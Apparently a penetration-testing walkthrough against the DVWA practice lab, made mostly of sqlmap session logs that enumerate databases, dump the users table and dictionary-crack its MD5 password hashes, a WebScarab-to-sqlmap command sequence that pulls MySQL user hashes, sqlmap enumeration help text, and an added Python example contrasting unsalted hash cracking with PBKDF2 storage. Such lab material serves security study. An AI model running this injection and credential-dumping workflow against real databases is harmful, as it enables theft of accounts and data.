[10:24:22] [INFO] fetching columns LIKE 'password' for table 'users' on database 'dvwa'
[10:24:22] [INFO] fetching column(s) 'password' entries for table 'users' on database 'dvwa'
recognized possible password hash values. do you want to use dictionary attack on retrieved table items? [Y/n/q] y
[10:24:24] [INFO] using hash method: 'md5_generic_passwd'
what's the dictionary's location? [/pentest/database/sqlmap/txt/wordlist.txt]
[10:24:26] [INFO] loading dictionary from: '/pentest/database/sqlmap/txt/wordlist.txt'
do you want to use common password suffixes? (slow!) [y/N] y
[10:24:28] [INFO] starting dictionary attack (md5_generic_passwd)
[10:24:28] [INFO] found: 'abc123' for hash: 'e99a18c428cb38d5f260853678922e03'
[10:24:29] [INFO] found: 'charley' for hash: '8d3533d75ae2c3966d7e0d4fcc69216b'
[10:24:29] [INFO] found: 'letmein' for hash: '0d107d09f5bbe40cade3de5c71e9e9b7'
[10:24:30] [INFO] found: 'password' for hash: '5f4dcc3b5aa765d61d8327deb882cf99'
Database: dvwa
Table: users
[4 entries]
+---------------------------------------------+
| password |
+---------------------------------------------+
| 0d107d09f5bbe40cade3de5c71e9e9b7 (letmein) |
| 8d3533d75ae2c3966d7e0d4fcc69216b (charley) |
| e99a18c428cb38d5f260853678922e03 (abc123) |
| 5f4dcc3b5aa765d61d8327deb882cf99 (password) |
+---------------------------------------------+

[10:24:30] [INFO] Table 'dvwa.users' dumped to CSV file '/pentest/database/sqlmap/output/10.255.245.136/dump/dvwa/users.csv'
[10:24:30] [INFO] Fetched data logged to text files under '/pentest/database/sqlmap/output/10.255.245.136'

[*] shutting down at: 10:24:30

http://www.myexploit.wordpress.com/web-application-webscarab/

--------------------------------------------------------------

/pentest/web/webscarab

root@bt:/pentest/web/webscarab# java -jar webscarab-one-20110329-1330.jar

root@bt:/pentest/database/sqlmap# ./sqlmap.py -l /tmp/webscarab1111.tmp/conversations

root@bt:/pentest/database/sqlmap# ./sqlmap.py -l /tmp/webscarab0087.tmp/conversations --users --passwords --tables --dbs --level=2 --risk=1 --scope=^IP-Address$

[02:35:19] [WARNING] no clear password(s) found
database management system users password hashes:

[*] root [1]:
password hash: *263027ECC84AA7B81EA86B0EBECAFE20BC8804FC

Note: you can also look the hash up on online hash-lookup sites.

MySQL 4.1 and later use SHA-1 based password hashes.

http://www.md5decrypter.co.uk/sha1-decrypt.aspx

263027ecc84aa7b81ea86b0ebecafe20bc8804fc = dojo
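An added example, not from the original post, covering both the MySQL password hashes seen here and the dvwa.users MD5 column dumped above: it shows how a MySQL 4.1+ hash is formed, why an unsalted MD5 column falls to a wordlist in seconds, and what a salted, iterated PBKDF2 store looks like instead. The wordlist and the storage format are my own constructions; the four MD5 values are the ones sqlmap reported in the dump above.

```python
import hashlib
import hmac
import os

def mysql_native_hash(password: str) -> str:
    """MySQL 4.1+ PASSWORD(): '*' followed by uppercase hex of SHA1(SHA1(password)).
    Unsalted, so identical passwords give identical hashes across every server."""
    inner = hashlib.sha1(password.encode()).digest()
    return "*" + hashlib.sha1(inner).hexdigest().upper()

def dictionary_lookup(target_hex: str, wordlist, algo: str = "md5"):
    """Return the first wordlist entry whose unsalted hash equals target_hex, else None.
    A fast unsalted hash makes this one hash computation per candidate: the weakness."""
    target = target_hex.lower()
    for word in wordlist:
        if hashlib.new(algo, word.encode()).hexdigest() == target:
            return word
    return None

def pbkdf2_store(password: str, iterations: int = 200_000, salt: bytes = b"") -> str:
    """Salted, iterated hash for storage (constructed format: pbkdf2_sha256$iters$salt$hash)."""
    salt = salt or os.urandom(16)
    dk = hashlib.pbkdf2_hmac("sha256", password.encode(), salt, iterations)
    return f"pbkdf2_sha256${iterations}${salt.hex()}${dk.hex()}"

def pbkdf2_verify(password: str, stored: str) -> bool:
    """Recompute with the stored salt and iteration count; constant-time compare."""
    _, iters, salt_hex, dk_hex = stored.split("$")
    dk = hashlib.pbkdf2_hmac("sha256", password.encode(), bytes.fromhex(salt_hex), int(iters))
    return hmac.compare_digest(dk.hex(), dk_hex)

# Constructed wordlist; the hashes are the dvwa.users values sqlmap dumped above.
WORDLIST = ["123456", "letmein", "abc123", "password", "charley"]
DUMPED_MD5 = [
    "0d107d09f5bbe40cade3de5c71e9e9b7",
    "8d3533d75ae2c3966d7e0d4fcc69216b",
    "e99a18c428cb38d5f260853678922e03",
    "5f4dcc3b5aa765d61d8327deb882cf99",
]

def crack_dump(hashes=DUMPED_MD5, wordlist=WORDLIST) -> dict:
    """Map each dumped MD5 to the wordlist entry that produces it (None if not found)."""
    return {h: dictionary_lookup(h, wordlist) for h in hashes}

if __name__ == "__main__":
    for h, word in crack_dump().items():
        print(h, "->", word)
    print(mysql_native_hash("dojo"))
    stored = pbkdf2_store("password")
    print(stored, pbkdf2_verify("password", stored))
```

The same five-word list that recovers every dumped MD5 value would have to be hashed 200,000 times per candidate against the PBKDF2 store, and a different salt per user means the work cannot be shared between accounts or with a precomputed lookup site.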

[02:35:19] [INFO] fetching database names
[02:35:19] [INFO] read from file '/pentest/database/sqlmap/output/IP-Address/session': information_schema, dvwa, mysql, w3af_test
available databases [4]:
[*] dvwa
[*] information_schema
[*] mysql
[*] w3af_test

[02:35:19] [INFO] fetching tables for databases: w3af_test, dvwa, information_schema, mysql
Database: w3af_test
[2 tables]
+---------------------------------------+
| customers |
| users |
+---------------------------------------+

Database: dvwa
[2 tables]
+---------------------------------------+
| guestbook |
| users |
+---------------------------------------+

[02:35:20] [INFO] fetching columns for table 'users' on database 'dvwa'
Database: dvwa
Table: users
[6 columns]
+------------+-------------+
| Column | Type |
+------------+-------------+
| avatar | varchar(70) |
| first_name | varchar(15) |
| last_name | varchar(15) |
| password | varchar(32) |
| user | varchar(15) |
| user_id | int(6) |
+------------+-------------+

Enumeration:
These options can be used to enumerate the back-end database
management system information, structure and data contained in the
tables. Moreover you can run your own SQL statements.
-b, --banner Retrieve DBMS banner
--current-user Retrieve DBMS current user
--current-db Retrieve DBMS current database
--is-dba Detect if the DBMS current user is DBA
--users Enumerate DBMS users
--passwords Enumerate DBMS users password hashes
--privileges Enumerate DBMS users privileges
--roles Enumerate DBMS users roles
--dbs Enumerate DBMS databases
--tables Enumerate DBMS database tables
--columns Enumerate DBMS database table columns
--dump Dump DBMS database table entries
--dump-all Dump all DBMS databases tables entries
--search Search column(s), table(s) and/or database name(s)
-D DB DBMS database to enumerate
-T TBL DBMS database table to enumerate
-C COL DBMS database table column to enumerate
-U USER DBMS user to enumerate
--exclude-sysdbs Exclude DBMS system databases when enumerating tables
--start=LIMITSTART First query output entry to retrieve
--stop=LIMITSTOP Last query output entry to retrieve
--first=FIRSTCHAR First query output word character to retrieve
--last=LASTCHAR Last query output word character to retrieve
--sql-query=QUERY SQL statement to be executed
--sql-shell Prompt for an interactive SQL shell
